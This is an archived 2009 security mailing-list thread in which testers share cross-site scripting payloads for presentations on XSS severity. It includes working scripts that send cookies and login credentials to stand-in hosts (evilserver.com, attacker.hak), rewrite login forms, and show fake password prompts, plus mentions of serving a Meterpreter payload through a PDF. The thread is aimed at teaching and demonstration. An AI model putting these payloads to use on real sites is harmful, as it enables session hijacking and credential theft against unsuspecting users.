Home page logo
/

pauldotcom logo PaulDotCom mailing list archives

Cool things to inject via XSS
From: packetjack at gmail.com (packetjack)
Date: Fri, 29 May 2009 09:54:46 -0400

Sounds like a sweet presentation you're giving, Adrian. I agree, the
<script>alert("XSS");</script>,is so boring.  Kudos to you for making an
interesting presentation! Is this an online presentation?  I'd love to see
it if so!  I test webapps and often can prove a site is vuln due to the
example given above, but I would like to learn some of the ways you and
others mentioned, ones that will show upper mgt what this "little vuln" is
capable of.....
Mary

On Fri, May 29, 2009 at 7:45 AM, Michael Douglas <mick at pauldotcom.com>wrote:

While all these samples are really fun, I've lately had great luck by
making two different XSS attacks when I'm showing folks.

One for the devs -- this tends to be a bit more "fun" and does stuff
like click trapping.

For marketing or the project managers -- the ones I've found most
likely to sweep these bugs under the rug -- I send them "brand damage"
examples.  (Cock ring size is freaking hilarious, but would send me to
HR).  So I do things like image swapping, or setting the background to
a LOLCat or a competitor logo.

The all time XSS FTW moment was about 4 years ago now, when someone
found an XSS problem on a McDonald's site.  Their link was so damn
sweet, it's what got me interested in web app security.  when you
clicked it, you we sent to a page that had all the McD's wrappings but
the content section of the window was blank except for in lovely red
letters it said: "Hey FATTIE! You really shouldn't be eating our
food!"



On Fri, May 29, 2009 at 3:35 AM,  <christopher.riley at r-it.at> wrote:
You could use a couple of typical password/cookie stealing examples.

Cookie stealing iframe.:
"><IFRAME
SRC="javascript:window.location=%22
http://evilserver.com/evil.php?stuff=%22+document.cookie";
height="1" width="1" frameborder="0"></IFRAME>

Altering the logon form.:
"><script>window.onload =
function()document.loginForm.action='
http://evilserver.com/evil.php?details=&apos;</script><!----

I like to use the logon form example for my penetration testing
presentations as it looks 100% normal to the user, except it redirects
the
Submit button to send the logon information (username/password in most
cases) to your evilserver instead of the real server. You can also
rewrite
the code in the users browser to remove password hashing to make it
easier
to get the clear text password. On the server end I usually just put up a
Metasploit HTTP or a netcat listener on the evilserver.com address to
output
the traffic to a logfile. You can also log it to a Database for mass
farming
of data, but we don't do that kind of thing, we leave that to Bob ;)

If you want something evil on the client-side, try an iframe that
references
a PDF file. You can then export a PDF from Metasploit and embed the
Meterpreter payload for total world domination.

Chris John Riley

pauldotcom-bounces at mail.pauldotcom.com () inet wrote on 28.05.2009
20:50:39:

Ok, I've got yet another presentation coming up, this time on the OWASP
Top 10
and Mutillidae. One of the things I'm going to cover is XSS. The
canonical
example of course is:

<script>alert("XSS");</script>

but that is boring, and gives folks the impression that XSS is not that
serious.  Better short eample swoul be:

Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/";</script>

A little cookie Grabbing:
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie=
"+encodeURI(document.cookie);
</script>

Or maybe a password form to make people think they have to login, but it
just
grabs the credentials:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username=
"+username+"&password="+password+"\">");
</script>

What are other cool thing to inject, besides maybe BeEF, that shows of
how
XSS
can be a big deal?

Thanks,
Adrian
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
----------------------------------------
Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien,
DVR
0486809, UID ATU 16351908

Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail
dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche
Erklaerungen
duerfen ueber dieses Medium nicht ausgetauscht werden.
Correspondence with above mentioned sender via e-mail is only for
information purposes. This medium may not be used for exchange of
legally-binding communications.
----------------------------------------


_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090529/04ddc0b9/attachment.htm 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]